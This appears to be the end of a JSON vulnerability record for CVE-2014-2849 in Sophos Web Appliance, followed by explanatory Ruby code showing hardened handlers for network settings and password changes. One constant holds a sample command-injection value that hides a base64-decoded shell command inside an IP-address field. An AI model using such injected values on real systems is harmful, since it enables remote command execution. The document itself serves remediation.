      {
        "db": "BID",
        "id": "66734",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "32789",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "57706",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-2026",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126099",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      },
      {
        "db": "BID",
        "id": "66734"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "PACKETSTORM",
        "id": "126099"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      }
    ]
  },
  "id": "VAR-201404-0438",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T22:08:21.272000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "120230",
        "trust": 1.5,
        "url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/66734"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/32789"
      },
      {
        "trust": 1.7,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/57706"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2849"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2849"
      },
      {
        "trust": 0.1,
        "url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/\u0027]"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069"
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      },
      {
        "db": "PACKETSTORM",
        "id": "126099"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-14-069",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-70788",
        "ident": null
      },
      {
        "db": "BID",
        "id": "66734",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "126099",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2849",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2014-04-08T00:00:00",
        "db": "ZDI",
        "id": "ZDI-14-069",
        "ident": null
      },
      {
        "date": "2014-04-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-70788",
        "ident": null
      },
      {
        "date": "2014-04-08T00:00:00",
        "db": "BID",
        "id": "66734",
        "ident": null
      },
      {
        "date": "2014-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002000",
        "ident": null
      },
      {
        "date": "2014-04-09T23:53:40",
        "db": "PACKETSTORM",
        "id": "126099",
        "ident": null
      },
      {
        "date": "2014-04-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201404-157",
        "ident": null
      },
      {
        "date": "2014-04-11T15:55:27.660000",
        "db": "NVD",
        "id": "CVE-2014-2849",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2014-04-08T00:00:00",
        "db": "ZDI",
        "id": "ZDI-14-069",
        "ident": null
      },
      {
        "date": "2014-04-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-70788",
        "ident": null
      },
      {
        "date": "2014-04-17T01:09:00",
        "db": "BID",
        "id": "66734",
        "ident": null
      },
      {
        "date": "2014-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-002000",
        "ident": null
      },
      {
        "date": "2014-04-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201404-157",
        "ident": null
      },
      {
        "date": "2024-11-21T02:07:03.033000",
        "db": "NVD",
        "id": "CVE-2014-2849",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "126099"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "Sophos Web Appliance Change Password dialog box vulnerability allowing the admin user password to be changed",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-002000"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201404-157"
      }
    ],
    "trust": 0.6
  }
}
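The module's exploit method above leans on two server-side checks that the appliance did not make: the `change_password` action accepted a client-supplied `admins` record and applied it, and the `netinterface` action passed the `address` field into a shell unescaped (hence the backtick injection inside `192.16`...`8.1.16`). The following is an added example, written for this page; it is not Sophos code and not part of the Metasploit module. Field names (`dhcp`, `address`, `netmask`, `gateway`, `dns1`..`dns3`, `current`, `new`, `admins`) are the ones the module posts; the interface name `eth0`, the use of `ifconfig`, and the password-store layout are assumptions.

```ruby
# Added example: hypothetical server-side handlers, not Sophos code and not
# part of the Metasploit module above. Field names are the ones the module
# posts; 'eth0', 'ifconfig' and the password-store layout are assumptions.
require 'base64'
require 'ipaddr'
require 'openssl'
require 'shellwords'

# Constructed sample: the shape of the value the module places in 'address'.
INJECTED_ADDRESS = "192.16`echo aWQ=|base64 --decode|sh`8.1.16"

# ---- 1. netinterface: validate strictly, then keep values away from a shell ----

# Anchored dotted-quad check; IPAddr then rejects out-of-range octets.
IPV4_LITERAL = /\A(?:\d{1,3}\.){3}\d{1,3}\z/.freeze

def valid_ipv4?(value)
  return false unless value.is_a?(String) && IPV4_LITERAL.match?(value)
  IPAddr.new(value).ipv4?
rescue IPAddr::InvalidAddressError
  false
end

# Returns [ok, errors] for the static-interface form.
def validate_netinterface(params)
  errors = []
  errors << 'dhcp: must be yes or no' unless %w[yes no].include?(params['dhcp'])
  %w[address gateway netmask dns1].each do |key|
    errors << "#{key}: not an IPv4 literal" unless valid_ipv4?(params[key])
  end
  %w[dns2 dns3].each do |key|
    v = params[key].to_s
    errors << "#{key}: not an IPv4 literal" unless v.empty? || valid_ipv4?(v)
  end
  [errors.empty?, errors]
end

# argv form: with system(*argv) / Process.spawn(*argv) no shell parses the
# values, so backticks or $() in a field are never interpreted.
def ifconfig_argv(params)
  ['ifconfig', 'eth0', params['address'], 'netmask', params['netmask']]
end

# If a single shell string is unavoidable, escape every element.
def ifconfig_shell(params)
  ifconfig_argv(params).shelljoin
end

# ---- 2. change_password: identity from the session, admin list from nowhere ----

PBKDF2_ITERATIONS = 100_000

def hash_password(password, salt)
  OpenSSL::PKCS5.pbkdf2_hmac(password, salt, PBKDF2_ITERATIONS, 32,
                             OpenSSL::Digest.new('sha256')).unpack1('H*')
end

def make_user(password, admin: false)
  salt = OpenSSL::Random.random_bytes(16)
  { salt: salt, hash: hash_password(password, salt), admin: admin }
end

# Constant-time comparison so timing does not leak how many bytes matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def password_matches?(record, password)
  secure_equal?(hash_password(password, record[:salt]), record[:hash])
end

# request carries base64 'current' and 'new' (after form decoding) and the
# 'admins' blob the module sends; the fixed handler never reads 'admins'.
# Returns [http_status, message].
def change_password(session, store, request)
  user = session[:username]
  return [403, 'not authenticated'] unless user && store.key?(user)
  current = Base64.strict_decode64(request['current'].to_s)
  new_pw  = Base64.strict_decode64(request['new'].to_s)
  return [403, 'current password incorrect'] unless password_matches?(store[user], current)
  return [400, 'new password too short'] if new_pw.bytesize < 8
  # Only the caller's own record is rewritten; the role stays as it was.
  store[user] = make_user(new_pw, admin: store[user][:admin])
  [200, 'password changed']
rescue ArgumentError
  [400, 'malformed request']
end
```

Two points worth noting. The regex alone would still pass `999.1.1.1`, which is why `IPAddr` is consulted afterwards; and even with validation in place, the argv form of the command is the real fix, because it removes the shell from the path entirely rather than relying on every future field being validated. On the password side, the handler derives the user from the session and writes only that user's record, so a request that carries someone else's `admins` entry, as the module's does, changes nothing but the caller's own password.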

